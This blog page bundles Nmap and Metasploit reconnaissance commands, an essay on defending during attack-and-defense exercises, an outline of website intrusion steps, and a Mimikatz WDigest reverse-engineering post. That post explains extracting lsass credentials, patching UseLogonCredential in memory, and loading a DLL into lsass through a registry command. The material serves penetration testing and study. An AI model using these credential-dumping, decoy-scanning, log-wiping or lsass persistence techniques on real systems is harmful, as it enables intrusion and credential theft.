Jimm Wayans
nmap scanning

Active Information Gathering with Metasploit-Framework

Using Nmap to perform port scanning

The -sT (TCP connect) scan is Nmap's default mode when run without raw-packet privileges. It judges the state of each target port by completing a full TCP three-way handshake. Because a full connection is established, these scans are very easy for the target's firewall or IDS to capture.

msf> nmap -sT <target>
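What -sT does under the hood can be illustrated with a few lines of Python: a connect scan simply asks the OS to complete the full TCP handshake and reports whether it succeeded (host and port here are hypothetical placeholders, not from the original):

```python
import socket

def tcp_connect_scan(host: str, port: int, timeout: float = 1.0) -> bool:
    """Minimal illustration of nmap -sT: attempt a full TCP three-way
    handshake via connect(), then tear the connection down."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        # connect_ex returns 0 when the handshake completed (port open)
        return s.connect_ex((host, port)) == 0
```

Because the handshake runs to completion, the connection shows up in the target's logs exactly like a normal client, which is why -sT is so easy to detect.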

The -sS scan mode does not complete the three-way handshake: it sends a SYN and tears the connection down after the SYN/ACK, which is why it is called a half-open or stealth scan. Compared to a TCP connect scan it is faster and less likely to be logged.

msf> nmap -sS <target>

The -sU scan mode probes UDP ports. Because UDP is connectionless, Nmap must infer port state from replies (or their absence), so UDP scans are often slow and their results may differ from the two scan modes above (ports can be reported as open|filtered).

msf> nmap -sU <target>

Operating system identification.
Nmap can identify the target operating system in two ways:

1. The commonly used -O parameter is an advanced option that enables Nmap's operating-system fingerprinting; it is usually used on its own.

msf> nmap -O <target>

2. The -sV parameter can be combined with the port-scan parameters above; nmap appends the identified service and version information to the scan results.

msf> nmap -sSV <target>

Nmap security scan

Scans against a target site or host are usually logged by a WAF or IDS, which is risky for the tester, so hiding the source IP of intrusive or deceptive scans is necessary. Nmap provides the -D (decoy) advanced parameter: if you supply two decoy IP addresses, Nmap leaves three source addresses in the WAF log (the two decoys plus your real one), confusing the audience and protecting the tester as much as possible.

msf> nmap -sS -D <decoy1>,<decoy2> <target>

1. TCP port scan

msf> use auxiliary/scanner/portscan/tcp 

2. SYN port scan

msf> use auxiliary/scanner/portscan/syn

3. Call nmap

Within metasploit-framework, db_nmap can perform complete banner grabbing with the following command:

msf> db_nmap -Pn -sTV -T4 --open --min-parallelism 64 --version-all -p - <target>

The -Pn parameter tells Nmap the target is known to be online, so host discovery is skipped. -sTV performs a TCP connect scan while grabbing the banner and version information of each open port. --min-parallelism 64 keeps at least 64 probes in flight, --version-all uses all of nmap's probes to identify service details, and setting -p to - scans all ports on the target.

4. Use ARP for live host scanning

msf> use auxiliary/scanner/discovery/arp_sweep
msf> set RHOSTS <target range>
msf> set THREADS 10
msf> run

5. Use UDP to detect live hosts

msf> use auxiliary/scanner/discovery/udp_sweep
msf> set RHOSTS <target range>
msf> set THREADS 10
msf> run

6. Use SMB to detect live hosts

msf> use auxiliary/scanner/smb/smb_enumshares
msf> set RHOSTS <target range>
msf> set THREADS 10
msf> run

7. SMB version scan

msf> use auxiliary/scanner/smb/smb_version 

8. SMB brute force (dictionary required)

msf> use auxiliary/scanner/smb/smb_login

9. SSH version scan

msf> use auxiliary/scanner/ssh/ssh_version

10. FTP version scan

msf> use auxiliary/scanner/ftp/ftp_version

11. SMTP enumeration

msf> use auxiliary/scanner/smtp/smtp_enum

12. SNMP enumeration

msf> use auxiliary/scanner/snmp/snmp_enum

13. SNMP login

msf> use auxiliary/scanner/snmp/snmp_login

14. WinRM scan

msf> use auxiliary/scanner/winrm/winrm_auth_methods

15. WinRM command execution (requires valid credentials)

msf> use auxiliary/scanner/winrm/winrm_cmd

Offensive and Defense Exercise Preparation | How to build an effective corporate security defense system

After the epidemic, work and life have gradually returned to normal, and for the network security industry, offensive and defensive drills are back on the agenda. How should companies prepare their defenses in the new year? Let us look for answers in a review of 2019/20.

In 2019/20, offensive and defensive exercises became a buzzword in the security world, with events of all sizes running continuously. After taking part, many companies re-examine their own defensive capabilities, and even those of their partners. The essence of an offensive and defensive exercise is to verify the effectiveness of corporate security defenses from the attacker's perspective. This article therefore takes the attacker's viewpoint to offer practical suggestions for companies facing such exercises or wishing to build an effective defense system.

Recurring attack chain

When it comes to attacks, we have to mention the "Cyber Kill Chain". Based on the attack methods seen in actual offensive and defensive exercises in recent years, we have drawn the "attack chain" shown in the following figure:

Cyber Kill Chain

Attack chain in offensive and defensive exercises

Everything is difficult at the beginning. The first problem an attacker faces after selecting a target is finding a breakthrough point. Most attackers combine domain-name, IP, and other asset scanning to reconnoitre the target's business systems, and the Web remains the main point of entry. Web vulnerabilities have emerged endlessly over the years: attackers implant Webshell variants on web servers, intrude further, gain server permissions, and keep collecting intranet information to expand their gains. Many companies have gaps or bypasses in their Web defenses: web assets go undiscovered, or WAF protections are bypassed. Formulating effective WAF rules quickly has therefore become the primary problem enterprises urgently need to solve, which is to block the attacker's entrance.

By discovering and exploiting vulnerabilities in border servers, attackers usually gain their first foothold, such as a Webshell, or even direct control of the server. Servers are the main battlefield of the confrontation: the business, data, and core assets of the enterprise all live there, and the attacker's goal is usually to obtain core data or control core business systems in order to penetrate further. On a compromised server, the attacker uses Webshell variants such as "ice scorpion" (Behinder), or even a rootkit, to deepen control. After entering the internal network they continue collecting data and information and install multiple backdoors, which often communicate with their control end over DNS tunnels, C&C channels, and the like. Sophisticated attackers frequently erase logs or even plant fake logs to confuse the defender.

The attack process is a dynamic process of continuous correction. A good attacker often combines the information he has obtained to continuously infiltrate and analyze the target.

The defender can become passive, even anxious, during such an exercise; detecting attackers effectively and blocking them in time becomes the urgent problem. Common protection methods include blocking attacker IPs, setting protection policies, continuously analyzing alongside existing security products, and operating and revising existing protection strategies.

Constructing the defensive quadrant

Combining the attacker's attack chain with the urgency of each need, I constructed a set of defense quadrants based on offensive and defensive confrontation. The quadrants cover not only products but also operations and services, aiming to help the defender deploy an effective security system quickly.


Defensive quadrant

1. The defense quadrant

The defense quadrant is the most important one. It contains the baseline products of enterprise protection, products whose main capability is preventing and blocking attacks; in real-world confrontation they can resist most attackers. Three deserve introduction: WAF, firewall (FW), and HIPS. A WAF can withstand most Web intrusions, especially a programmable WAF: when a new vulnerability appears during an exercise, it can be blocked immediately by writing a rule script. New-generation WAFs also include semantic-analysis technology, which reduces false positives and improves defense against unknown threats. The firewall controls assets at the border and detects and blocks malicious communication in the network. For key attack targets such as server assets, HIPS installed in the server operating system can immediately detect Webshells, rootkits, and hacking actions (reverse shells, brute forcing, privilege escalation, etc.) and intercept them, raising the level of protection for core assets.

2. Detection quadrant

The detection quadrant focuses on detecting and trapping attackers. Products in this quadrant can quickly detect intrusions, identify attacks, and trap and profile the attacker: for example HIDS, NTA, and honeypots. Here we focus on NTA and honeypots. NTA stands for Network Traffic Analysis, though I prefer to read it as Network Threat Analysis: modeling traffic to detect network threats and provide real-time awareness and early warning. Compared with a traditional IPS, these products offer more complete traffic coverage and threat modeling. A honeypot is an excellent tool for detecting intrusions: in a real network the defender will never trigger it, so attacker IPs caught by the honeypot can be sent straight to the firewall for blocking. Its JSONP probes can also profile the attacker, letting the defender grasp intrusion activity immediately; the profiling function plays a vital role in tracing the source of an attack.

3. Safe Operation Quadrant

The security-operations quadrant combines the previous two. Here we recommend pairing products with a security-analyst model. In recent years penetration-testing engineers have been in high demand, driven by result-oriented projects that push security construction back onto enterprises. As vulnerabilities keep emerging and hacking incidents increase, security analysts will become more important: they can analyze the effectiveness of the configuration and placement of the security products already deployed, tune them to their best, and investigate and trace security incidents, helping the enterprise solve the last mile of security. For tooling, SOAR (security orchestration, automation and response) can combine the analysts' playbooks with the APIs of the various systems to adjust protection and response strategies, achieving unified analysis, centralized display, rapid handling, and a closed security loop.

4. Threat Intelligence Quadrant

Work in the threat-intelligence quadrant falls into two categories. The first is the collection and analysis of real-time intelligence. During offensive and defensive exercises, especially large ones, intelligence becomes extremely important: the defender should continuously collect attack intelligence, such as the attacking team's methods, source IPs, and common tools, and feed it into the operation of the defense-quadrant products in a timely manner. The second category is passive intelligence collection. Take scanners as an example: new-generation scanners can rapidly profile assets and detect vulnerabilities. Given the attacker's methods, vulnerability detection here should center on Web vulnerabilities while also covering system vulnerability scanning. Such scanners help security analysts detect assets in real time during the protection period and scan, actively or passively, for vulnerabilities so that issues are resolved as early as possible.


Combined with security-analysis services, the security products in the four quadrants above can quickly raise a defender's capabilities to a higher level in a real exercise. The essence of offensive and defensive confrontation is to fully expose problems and verify the effectiveness of existing protections while continuously correcting the hidden issues that are discovered. This is a continuous process: the defender must keep track of its own asset changes, vulnerability updates, threat intelligence, and other information, and use them together to achieve an adequate defense.

I hope every defender can quickly and sensibly shore up the weaknesses revealed by offensive and defensive exercises according to their actual situation and, combined with effective security analysis and operational strategies, detect and block more attackers at their own gates as early as possible.

web security

How Do Hackers Break Into Websites?

As a company’s operation and maintenance personnel, especially for large and medium-sized enterprises, it is not uncommon for websites and web applications to be attacked by hackers.

Websites and web applications can be divided into three categories by operator: individual, team/company, and government.

The proportion of personal websites is still very large, and most of these websites use open source CMSs.

Blogs: WordPress, Joomla, Typecho, Z-Blog, and more;

Community categories: Discuz, PHPwind, StartBBS, Mybb, etc.

Team/company websites also make heavy use of common open source CMSs, while government websites are mostly outsourced developments.

Viewed more broadly, they can be divided into two major groups: open source and closed source.

What effectively exposes the pseudo-security of a website is proving, from a practical attacker's perspective, whether it is really solid.

The reason I discuss intrusion methods here is not to teach you how to break into websites, but to help you understand the various methods of intrusion. Only by knowing how attacks happen can you learn how to protect against them.

A kitchen knife can be used to cut vegetables, and it can also be used to kill people.

Let’s talk about some common procedures for hackers to invade websites.

The common process for hackers to attack and hack websites

1. Information Gathering

1.1 Whois information – registrant, phone, email, DNS, address

1.2 Google hack – sensitive directories, sensitive files, more information collection

1.3 Server IP – Nmap scan, services behind each port, C segment (the surrounding /24 range)

1.4 Side-site lookup (other sites sharing the server IP) – Bing query

1.5 If you encounter a CDN – Cloudflare (bypass), start with subdomains (mail, postfix), DNS zone transfer vulnerabilities

1.6 Server, components (fingerprint) – operating system, web server (apache, nginx, iis), scripting language

Through the information-gathering process, the attacker can obtain most of the information about the website. Information gathering is the first step of a website intrusion and determines the success of the subsequent attack.

2. Vulnerability Scanning 

2.1 Scan the website/web application for vulnerabilities – (tools: Acunetix, Burp Suite, dirsearch, Nikto, etc.)

2.2 XSS, CSRF, XSIO, SQL injection, permission bypass, arbitrary file reading, file inclusion…

2.3 Test for upload vulnerabilities – truncation, modification, analysis vulnerabilities

2.4 Is there a captcha or 2FA? If not – attempt brute force

By now, the attacker has a lot of information about your website and may have found vulnerabilities affecting your website. In the next step, they will begin to use those vulnerabilities to gain access to your website.

3. Vulnerability Exploitation

3.1 Think about the goal – what effect is to be achieved (exploit any vulnerabilities found)

3.2 Stealth vs. destructiveness – find a corresponding EXP/attack payload based on the detected application fingerprint, or write one yourself

3.3 Launch the exploit, obtain the corresponding permissions, and get a webshell on the server, depending on the scenario

4. Privilege Escalation

4.1 Choose different attack payloads for privilege escalation according to the server type (Use Metasploit where possible)

4.2 If privilege escalation is not possible, start password guessing based on the information obtained, and loop back to information collection

5. Implant a Backdoor

5.1 Concealment

5.2 Check and update regularly to maintain persistence

6. Log cleanup (Clear your tracks)

6.1 Camouflage and concealment – to avoid raising alarms, attackers usually delete only the specific log entries that reveal them

6.2 Locate the log files covering the time window of the intrusion and remove only the corresponding entries

Having said all this, how much of these steps do you understand? Read more and research online.

Of course, the type of attack may largely depend on the motivation the hacker has.

Although the process can take a long time, the general idea is as described above.

After talking about the intrusion process, let's talk about why enterprise websites need to be secured.

First: Cybersecurity law regulations

The proposed cybersecurity law clearly requires critical information infrastructure operators to, by themselves or by engaging a network security service organization, inspect and assess their network security and possible risks at least once a year, and to report the results and improvement measures to the department responsible for protecting critical information infrastructure. This is quite mandatory: the legal-liability section explicitly states that operators who fail to fulfil these obligations will be ordered by the relevant competent department to rectify and will be given warnings.

Regarding the interpretation of the Cybersecurity Law, you can click here to view it.

It is worth noting that penetration testing is a commonly used and very important method in information security risk assessment and web security.

Second: Penetration testing helps PCI DSS compliance construction

Section 11.3 of PCI DSS (the Payment Card Industry Data Security Standard) requires internal and external penetration testing at least annually and after any significant upgrade or modification to the infrastructure or applications (such as an operating system upgrade, or adding a sub-network or a web server to the environment).

Third: Baseline requirements for ISO27001 certification

The ISO27001 annex "A12: Information System Development, Acquisition and Maintenance" requires establishing a secure software development life cycle and specifically proposes that additional penetration tests be conducted, with reference to standards such as OWASP, before going live.

Fourth: Requirements in the CBK’s multiple regulatory guidelines

The multiple regulatory guidelines issued by the Central Bank of Kenya explicitly require penetration testing and control-capability inspection and evaluation of a bank's security strategy, internal control system, risk management, system security, and other aspects.

Fifth: Minimize business losses

In addition to meeting policy compliance requirements, improving customers' operational security, or satisfying business partners, the ultimate goal should be to minimize business risk.

Companies need to conduct as many penetration tests as possible to keep security risks under control.

In the process of website development, many hidden security problems that are difficult to control and discover will occur. When these large numbers of flaws are exposed to the external network environment, information security threats are generated.

Regular penetration testing lets companies detect and resolve these problems early. A system becomes more stable and secure after being tested and hardened by cybersecurity professionals, and the test report helps managers make better project decisions, justifies an increased security budget, and conveys security issues to senior management.

The difference between penetration testing and security testing

Penetration testing differs from traditional security scanning. Within an overall risk-assessment framework, its relationship to security scanning can be described as a continuation: as mentioned above, it verifies and supplements the scan results.

In addition, the biggest difference between penetration testing and traditional security scanning is that penetration testing requires a lot of manual intervention.

These tasks are mainly initiated by cybersecurity professionals. On the one hand, they use their professional knowledge to conduct in-depth analysis and judgment on the scan results.

On the other hand, they draw on their experience to manually check and test for hidden security issues that scanners cannot find, producing more accurate verification (or simulated intrusion).

In case you need a security service such as penetration testing, drop me a line on twitter @jimmwayans and I'll be glad to work with you.


Mimikatz Exploration – WDigest

Mimikatz remains, to this day, the tool of choice for extracting credentials from lsass on Windows operating systems. This is largely because, with each new security control introduced by Microsoft, gentilkiwi always finds a way around it. If you have ever looked at the effort that goes into Mimikatz, this is no easy task, with all versions of Windows x86 and x64 supported. And with the success of Mimikatz over the years, blue teams are now very adept at detecting its use in its many forms: execute Mimikatz on a host in an environment with any maturity at all and you are likely to be flagged. Almost all modern EDRs will detect Mimikatz very quickly.

It's always very important to understand your tools beyond just executing a script and running automated commands. With security vendors reducing and monitoring the attack surface of common tricks often faster than we can discover fresh methods, knowing how a particular technique works down to the API calls can offer a lot of benefits when avoiding detection in well protected environments.

That being said, Mimikatz is a tool that is carried along with most post-exploitation toolkits in one form or another. And while some security vendors are monitoring for process interaction with lsass, many more have settled on attempting to identify Mimikatz itself.

I’ve been toying with the idea of stripping down Mimikatz for certain engagements (mainly those where exfiltrating a memory dump isn’t feasible or permitted), but it has been bugging me for a while that I’ve spent so long working with a tool that I’ve rarely reviewed low-level.

So I wanted to change this and explore some of its magic, starting with where it all began, WDigest. Specifically, we will look at how cleartext credentials are actually cached in lsass, and how they are extracted from memory with "sekurlsa::wdigest". This will mean disassembly and debugging, but hopefully by the end you will see that while it's difficult to duplicate the amount of effort that has gone into Mimikatz, if your aim is to use only a small portion of the available functionality, it may be worth crafting a custom tool based on the Mimikatz source code rather than taking along the full suite.

To finish off the post I will also explore some additional methods of loading arbitrary DLLs within lsass, which can hopefully be combined with the code examples demonstrated.

Note: This post uses Mimikatz source code heavily as well as the countless hours dedicated to it by its developer(s). This effort should become more apparent as you see undocumented structures which are suddenly revealed when browsing through code. Thanks to Mimikatz, Benjamin Delpy and Vincent Le Toux for their awesome work.

How does Mimikatz’s “sekurlsa::wdigest” actually work?

As mentioned, in this post we will look at WDigest, arguably the feature Mimikatz became most famous for. WDigest credential caching was enabled by default up until Windows Server 2008 R2, after which caching of plain-text credentials was disabled.

When reversing an OS component, I usually like to attach a debugger and review how it interacts with the OS during runtime. Unfortunately in this case it isn't as simple as attaching WinDBG to lsass: pretty quickly you'll see Windows grind to a halt before warning you of a pending reboot. Instead we'll have to attach to the kernel and switch over to the lsass process from Ring-0.

With a kernel debugger attached, we need to grab the EPROCESS address of the lsass process, which is found with the !process 0 0 lsass.exe command:



With the EPROCESS address identified (ffff9d01325a7080 above), we can request that our debug session is switched to the lsass process context:


A simple lm will show that we now have access to the WDigest DLL memory space:




If at this point you find that symbols are not processed correctly, a .reload /user will normally help.

With the debugger attached, let’s dig into WDigest.

Diving into wdigest.dll and a little of lsasrv.dll

If we look at Mimikatz source code, we can see that the process of identifying credentials in memory is to scan for signatures. Let’s take the opportunity to use a tool which appears to be in vogue at the minute, Ghidra, and see what Mimikatz is hunting for.

As I’m currently working on Windows 10 x64, I’ll focus on the PTRN_WIN6_PasswdSet signature seen below:



After providing this search signature to Ghidra, we reveal what Mimikatz is scanning memory for:




Above we have the function LogSessHandlerPasswdSet. Specifically the signature references just beyond the l_LogSessList pointer. This pointer is key to extracting credentials from WDigest, but before we get ahead of ourselves, let’s back up and figure out what exactly is calling this function by checking for cross references, which lands us here:



Here we have SpAcceptCredentials which is an exported function from WDigest.dll, but what does this do?


This looks promising as we can see that credentials are passed via this callback function. Let’s confirm that we are in the right place. In WinDBG we can add a breakpoint with bp wdigest!SpAcceptCredentials after which we use the runas command on Windows to spawn a shell:


This should be enough to trigger the breakpoint. Inspecting the arguments to the call, we can now see credentials being passed in:


If we continue with our execution and add another breakpoint on wdigest!LogSessHandlerPasswdSet, we find that although our username is passed, a parameter representing our password cannot be seen. However, if we look just before the call to LogSessHandlerPasswdSet, what we find is this:


This is actually a stub used for Control Flow Guard (Ghidra 9.0.3 looks like it has an improvement for displaying CFG stubs), but following along in a debugger shows us that the call is actually to LsaProtectMemory:


This is expected as we know that credentials are stored encrypted within memory. Unfortunately LsaProtectMemory isn’t exposed outside of lsass, so we need to know how we can recreate its functionality to decrypt extracted credentials. Following with our disassembler shows that this call is actually just a wrapper around LsaEncryptMemory:



And LsaEncryptMemory is actually just wrapping calls to BCryptEncrypt:



Interestingly, the encryption/decryption routine is chosen based on the length of the blob to be encrypted. If the buffer length is divisible by 8 (denoted by the "param_2 & 7" bitwise operation in the screenshot above), 3DES is used in CBC mode; otherwise AES is used in CFB mode, which as a stream mode copes with buffers of arbitrary length.
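If the length check works the way Mimikatz's sources suggest (buffers that are a whole number of 8-byte blocks go to 3DES-CBC, everything else to AES-CFB), the selection logic can be sketched in a few lines; this is an illustration, not lsass code:

```python
def pick_lsass_cipher(blob: bytes) -> str:
    """Mirror the `length & 7` check: 3DES in CBC mode needs full 8-byte
    blocks, while AES in CFB (stream) mode can handle any length."""
    return "3DES-CBC" if len(blob) & 7 == 0 else "AES-CFB"
```

A 16-character UTF-16LE password is 32 bytes (a multiple of 8) and would go to 3DES; a 7-character one is 14 bytes and would go to AES.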

So we now know that our password is encrypted by BCryptEncrypt, but what about the key? Well if we look above, we actually see references to lsasrv!h3DesKey and lsasrv!hAesKey. Tracing references to these addresses shows that lsasrv!LsaInitializeProtectedMemory is used to assign each an initial value. Specifically each key is generated based on calls to BCryptGenRandom:


This means that a new key is generated randomly each time lsass starts, which will have to be extracted before we can decrypt any cached WDigest credentials.

Back to the Mimikatz source code to confirm that we are not going too far off track, we see that there is indeed a hunt for the LsaInitializeProtectedMemory function, again with a comprehensive list of signatures for differing Windows versions and architectures:



And if we search for this within Ghidra, we see that it lands us here:


Here we see a reference to the hAesKey address. So, similar to the above signature search, Mimikatz is hunting for cryptokeys in memory.

Next we need to understand just how Mimikatz goes about pulling the keys out of memory. For this we need to refer to kuhl_m_sekurlsa_nt6_acquireKey within Mimikatz, which highlights the lengths that this tool goes to in supporting different OS versions. We see that hAesKey and h3DesKey (which are of the type BCRYPT_KEY_HANDLE returned from BCryptGenerateSymmetricKey) actually point to a struct in memory consisting of fields including the generated symmetric AES and 3DES keys. This struct can be found documented within Mimikatz:

typedef struct _KIWI_BCRYPT_HANDLE_KEY {
    ULONG size;
    ULONG tag;    // 'UUUR'
    PVOID hAlgorithm;
    PKIWI_BCRYPT_KEY key;
    PVOID unk0;
} KIWI_BCRYPT_HANDLE_KEY, *PKIWI_BCRYPT_HANDLE_KEY;

We can correlate this with WinDBG to make sure we are on the right path by checking for the “UUUR” tag referenced above:


At offset 0x10 we see that Mimikatz is referencing PKIWI_BCRYPT_KEY which has the following structure:

typedef struct _KIWI_BCRYPT_KEY81 {
    ULONG size;
    ULONG tag;    // 'MSSK'
    ULONG type;
    ULONG unk0;
    ULONG unk1;
    ULONG unk2; 
    ULONG unk3;
    ULONG unk4;
    PVOID unk5;    // before, align in x64
    ULONG unk6;
    ULONG unk7;
    ULONG unk8;
    ULONG unk9;
    KIWI_HARD_KEY hardkey;
} KIWI_BCRYPT_KEY81, *PKIWI_BCRYPT_KEY81;

And sure enough, following along with WinDBG reveals the same referenced tag:


The final member of this struct is a reference to what Mimikatz has named KIWI_HARD_KEY, which contains the following:

typedef struct _KIWI_HARD_KEY {
    ULONG cbSecret;
    BYTE data[ANYSIZE_ARRAY];
} KIWI_HARD_KEY, *PKIWI_HARD_KEY;

This struct consists of the size of the key as cbSecret, followed by the actual key within the data field. This means we can use WinDBG to extract this key with:


This gives us our h3DesKey which is 0x18 bytes long consisting of
b9 a8 b6 10 ee 85 f3 4f d3 cb 50 a6 a4 88 dc 6e ee b3 88 68 32 9a ec 5a.
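Pulling the key bytes out of a raw KIWI_HARD_KEY blob is just a length-prefixed read; here is a minimal sketch (the layout follows the struct above, and the input blob is a made-up example):

```python
import struct

def parse_hard_key(blob: bytes) -> bytes:
    """KIWI_HARD_KEY is a ULONG cbSecret followed by cbSecret key bytes."""
    (cb_secret,) = struct.unpack_from("<I", blob, 0)
    return blob[4:4 + cb_secret]
```

For the h3DesKey above, cbSecret would be 0x18 and the returned slice would be the 24 key bytes shown.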

Knowing this, we can follow the same process to extract hAesKey:


Now that we understand just how keys are extracted, we need to hunt for the actual credentials cached by WDigest. Let’s go back to the l_LogSessList pointer we discussed earlier. This field corresponds to a linked list, which we can walk through using the WinDBG command !list -x "dq @$extret" poi(wdigest!l_LogSessList):


These entries contain the following fields:

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    ULONG UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;

Following this struct are three LSA_UNICODE_STRING fields found at the following offsets:

  • 0x30 – Username
  • 0x40 – Hostname
  • 0x50 – Encrypted Password
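To illustrate how such an entry is consumed, here is a small Python sketch (hypothetical, assuming the standard x64 LSA_UNICODE_STRING layout: USHORT Length, USHORT MaximumLength, four bytes of alignment padding, then an 8-byte Buffer pointer) that reads one of these headers out of a captured entry buffer:

```python
import struct

def read_lsa_unicode_string(entry: bytes, offset: int):
    """Read an x64 LSA_UNICODE_STRING header from `entry` at `offset`:
    USHORT Length, USHORT MaximumLength, padding, PVOID Buffer."""
    length, max_length = struct.unpack_from("<HH", entry, offset)
    (buffer_ptr,) = struct.unpack_from("<Q", entry, offset + 8)
    return length, max_length, buffer_ptr

# Hypothetical entry buffer with a username header at offset 0x30:
# 8 bytes of UTF-16 (4 characters) at a fake lsass address
entry = bytearray(0x60)
struct.pack_into("<HH", entry, 0x30, 8, 10)
struct.pack_into("<Q", entry, 0x38, 0x7FF600001000)
print(read_lsa_unicode_string(bytes(entry), 0x30))
```

In a real extractor, Buffer points back into lsass memory, so a second read is needed to pull out the actual UTF-16 string (and, for the password field, the encrypted bytes).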

Again we can check that we are on the right path with WinDBG using a command such as:

!list -x "dS @$extret+0x30" poi(wdigest!l_LogSessList)

This will dump cached usernames as:


And finally we can dump the encrypted password using a similar command:

!list -x "db poi(@$extret+0x58)" poi(wdigest!l_LogSessList)


And there we have it, all the pieces required to extract WDigest credentials from memory.

So now that we have all the information needed for the extraction and decryption process, how feasible would it be to piece this together into a small standalone tool outside of Mimikatz? To explore this I’ve created a heavily commented POC which is available here. When executed on Windows 10 x64 (build 1809), it provides verbose information on the process of extracting creds:



By no means should this be considered OpSec safe, but it will hopefully give an example of how we can go about crafting alternative tooling.

Now that we understand how WDigest cached credentials are grabbed and decrypted, we can move onto another area affecting the collection of plain-text credentials, “UseLogonCredential”.

But UseLogonCredential is 0

So as we know, with everyone running around dumping cleartext credentials, Microsoft decided to disable support for this legacy protocol by default. Of course some users may still depend on WDigest, so to provide the option of re-enabling it, Microsoft pointed to the registry value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential. Toggling this from '0' to '1' forces WDigest to start caching credentials again, which of course meant that pentesters were back in the game. However, there was a catch: toggling this setting required a reboot of the OS, and I've yet to meet a client who would allow this outside of a test environment.

The obvious question is… why do you need to reboot the machine for this to take effect?

Edit: As pointed out by GentilKiwi, a reboot isn’t required for this change to take effect. I’ve added a review of why this is at the end of this section.

Let’s take a look at SpAcceptCredentials again, and after a bit of hunting we find this:


Here we can clearly see that there is a check for two conditions using global variables. If g_IsCredGuardEnabled is set to 1, or g_fParameter_UseLogonCredential is set to 0, we find that the code path taken is via LogSessHandlerNoPasswordInsert rather than the above LogSessHandlerPasswdSet call. As the name suggests, this function caches the session but not the password, resulting in the behaviour we normally encounter when popping Windows 2012+ boxes. It’s therefore reasonable to assume that this variable is controlled by the above registry key value based on its name, and we find this to be the case by tracing its assignment:


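The branch can be summarised as a tiny predicate. This is a paraphrase of the disassembled logic described above, not Microsoft's actual code:

```python
def wdigest_caches_cleartext(g_IsCredGuardEnabled: int,
                             g_fParameter_UseLogonCredential: int) -> bool:
    """Mirrors the SpAcceptCredentials check: the password is stored via
    LogSessHandlerPasswdSet only when Credential Guard is disabled AND
    UseLogonCredential is non-zero; otherwise the no-password path
    (LogSessHandlerNoPasswordInsert) is taken."""
    return g_IsCredGuardEnabled == 0 and g_fParameter_UseLogonCredential != 0

print(wdigest_caches_cleartext(0, 1))  # → True  (WDigest re-enabled)
print(wdigest_caches_cleartext(0, 0))  # → False (default on 2012+)
```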
By understanding what variables within WDigest.dll control credential caching, can we subvert this without updating the registry? What if we update that g_fParameter_UseLogonCredential parameter during runtime with our debugger?



Resuming execution, we see that cached credentials are stored again:


Of course most things are possible when you have a kernel debugger hooked up, but if you have a way to manipulate lsass memory without triggering AV/EDR (see our earlier Cylance blog post for one example of how you would do this), then there is nothing stopping you from crafting a tool to manipulate this variable. Again I’ve created a heavily verbose tool to demonstrate how this can be done which can be found here.

This example will hunt for and update the g_fParameter_UseLogonCredential value in memory. If you are operating against a system protected with Credential Guard, the modifications required to also update this value are trivial and left as an exercise to the reader.
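Locating g_fParameter_UseLogonCredential without symbols generally comes down to signature-scanning the loaded wdigest.dll image for instruction bytes that reference the variable, then resolving the relative offset. The pattern below is a made-up toy, since the real bytes are build-specific; this Python sketch only illustrates the wildcard-scan idea:

```python
def find_pattern(memory: bytes, pattern: bytes, wildcard: int = 0xAA) -> int:
    """Return the offset of the first match of `pattern` in `memory`,
    treating any `wildcard` byte in the pattern as match-anything.
    Returns -1 when the pattern is not present."""
    span = len(pattern)
    for i in range(len(memory) - span + 1):
        if all(p == wildcard or p == memory[i + j]
               for j, p in enumerate(pattern)):
            return i
    return -1

# Toy image: an instruction with an unknown 5-byte middle, matched as
# "39 ?? ?? ?? ?? ?? 00" with 0xAA standing in for the wildcard byte
image = bytes.fromhex("9090903905aabbccdd00c3")
hit = find_pattern(image, bytes.fromhex("39aaaaaaaaaa00"))
print(hit)  # → 3
```

A real implementation would then resolve the variable's address from the matched instruction's RIP-relative displacement and update the DWORD inside lsass via WriteProcessMemory.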

With our POC executed, we find that WDigest has now been re-enabled without having to set the registry key, allowing us to pull out credentials as they are cached:



Again this POC should not be considered as OpSec safe, but used as a verbose example of how you can craft your own.

Now of course this method of enabling WDigest comes with risks, mainly the WriteProcessMemory call into lsass, but if suited to the environment it offers a nice way to enable WDigest without setting a registry value. There are also other methods of acquiring plain-text credentials which may be more suited to your target outside of WDigest (memssp for one, which we will review in a further post).

Edit: As pointed out by GentilKiwi, a reboot is not required for UseLogonCredential to take effect… so back to the disassembler we go.

Reviewing other locations referencing the registry value, we find wdigest!DigestWatchParamKey which monitors a number of keys including:



The Win32 API used to trigger this function on update is RegNotifyKeyChangeValue:



And if we add a breakpoint on wdigest!DigestWatchParamKey in WinDBG, we see that it is triggered as we attempt to add a UseLogonCredential value:



Bonus Round – Loading an arbitrary DLL into LSASS

So while digging around with a disassembler I wanted to look for an alternative way to load code into lsass while avoiding potentially hooked Win32 API calls, or by loading an SSP. After a bit of disassembly, I came across the following within lsasrv.dll:



This attempt to call LoadLibraryExW on a user provided value can be found within the function LsapLoadLsaDbExtensionDll and allows us to craft a DLL to be loaded into the lsass process, for example:

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Insert l33t payload here
        break;
    }

    // Important to avoid BSOD
    return FALSE;
}

It is important that at the end of the DllMain function, we return FALSE to force an error on LoadLibraryEx. This is to avoid the subsequent call to GetProcAddress. Failing to do this will result in a BSOD on reboot until the DLL or registry key is removed.

With a DLL crafted, all that we then need to do is create the above registry key:

New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS -Name LsaDbExtPt -Value "C:\xpnsec.dll"

Loading of the DLL will occur on system reboot, which makes it a potential persistence technique for privileged compromises, pushing your payload straight into lsass (as long as PPL isn’t enabled of course).

Bonus Round 2 – Loading arbitrary DLL into LSASS remotely

After some further hunting, a similar vector to that above was found within samsrv.dll. Again a controlled registry value is loaded into lsass by a LoadLibraryEx call:



Again we can leverage this by adding a registry key and rebooting, however triggering this case is a lot simpler as it can be fired using SAMR RPC calls.

